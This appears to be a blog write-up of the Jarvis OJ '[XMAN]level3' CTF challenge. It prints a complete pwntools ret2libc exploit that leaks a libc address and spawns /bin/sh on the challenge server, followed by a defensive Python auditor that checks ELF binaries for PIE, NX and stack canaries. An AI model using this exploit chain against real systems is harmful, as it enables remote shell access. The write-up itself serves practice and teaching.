[XMAN]level3

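nc pwn2.jarvisoj.com 9879

Hint1: The attachment for this challenge has been updated; please download it again so that your solution is not affected.

level3.rar.f795bbaa1e4a3f9d467317d6df936c6b

32-bit stack overflow, ret2libc.

The exploit is as follows: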

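from pwn import *

#io = process('./level3')
#io = gdb.debug('./level3')
io = remote('pwn2.jarvisoj.com', 9879)
elf = ELF('./level3')
#libc = elf.libc
libc = ELF('./libc-2.19.so')

# Stage 1: 140 bytes of padding reach the saved return address.
# The chain calls write(1, 0x804A018, 4) through 0x8048340 to leak the
# resolved address of write, then returns to 0x804844B so the program
# prompts for input a second time.
io.recvuntil(b'Input:\n')
payload = b'a' * 140 + p32(0x8048340) + p32(0x804844B) + p32(1) + p32(0x804A018) + p32(4)
io.send(payload)
write_addr = u32(io.recv(4))
info("write_addr:" + str(hex(write_addr)))
# libc base = leaked runtime address - offset of write inside libc-2.19.so
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + str(hex(libc_base)))

# Stage 2: with the base known, compute system and "/bin/sh" and call
# system("/bin/sh") through the same overflow.
io.recvuntil(b'Input:\n')
system_addr = libc.symbols['system'] + libc_base
info("system_addr:" + str(hex(system_addr)))
binsh_addr = next(libc.search(b'/bin/sh')) + libc_base
info("binsh_addr:" + str(hex(binsh_addr)))
payload = b'a' * 140 + p32(system_addr) + p32(0x804844B) + p32(binsh_addr)
io.send(payload)

io.interactive()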
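
The exploit above hardcodes PLT/GOT addresses and overwrites the saved return address directly, which works only against a binary built without PIE and without a stack canary. As an added example (not part of the original post), this Python code audits a 32-bit little-endian ELF for those properties; `audit_elf32`, `findings` and `make_sample` are hypothetical names, the sample images are constructed, and the canary check is a string-search heuristic.

```python
import struct

ET_EXEC, ET_DYN = 2, 3            # e_type: fixed-address executable vs. PIE/shared object
PT_GNU_STACK, PF_X = 0x6474E551, 1

def audit_elf32(data: bytes) -> dict:
    """Report the hardening properties of a 32-bit little-endian ELF image."""
    if len(data) < 52 or data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not a 32-bit little-endian ELF")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx = False                    # no PT_GNU_STACK header: stack may be executable
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, base)
        (p_flags,) = struct.unpack_from("<I", data, base + 24)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    # Heuristic: canary-protected code references __stack_chk_fail in its string table.
    return {"pie": e_type == ET_DYN, "nx": nx, "canary": b"__stack_chk_fail" in data}

def findings(report: dict) -> list:
    """Map missing mitigations to the build flag that enables them."""
    out = []
    if not report["pie"]:
        out.append("no PIE: PLT/GOT addresses are fixed; build with -fPIE -pie")
    if not report["canary"]:
        out.append("no canary: return address unguarded; build with -fstack-protector-strong")
    if not report["nx"]:
        out.append("executable stack: link with -z noexecstack")
    return out

def make_sample(e_type: int, stack_flags: int, extra: bytes = b"") -> bytes:
    """Constructed minimal ELF32 image: header plus one PT_GNU_STACK program header."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr + extra

if __name__ == "__main__":
    samples = {"weak": make_sample(ET_EXEC, 6),                          # RW stack, no PIE
               "hardened": make_sample(ET_DYN, 6, b"__stack_chk_fail\0")}
    for name, image in samples.items():
        report = audit_elf32(image)
        print(name, report, findings(report))
```

An enabled NX stack does not stop this technique, since ret2libc reuses code already mapped in libc; PIE and a canary are the mitigations that break the hardcoded chain.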

 

posted @ 2021-07-17 15:10  hktk1643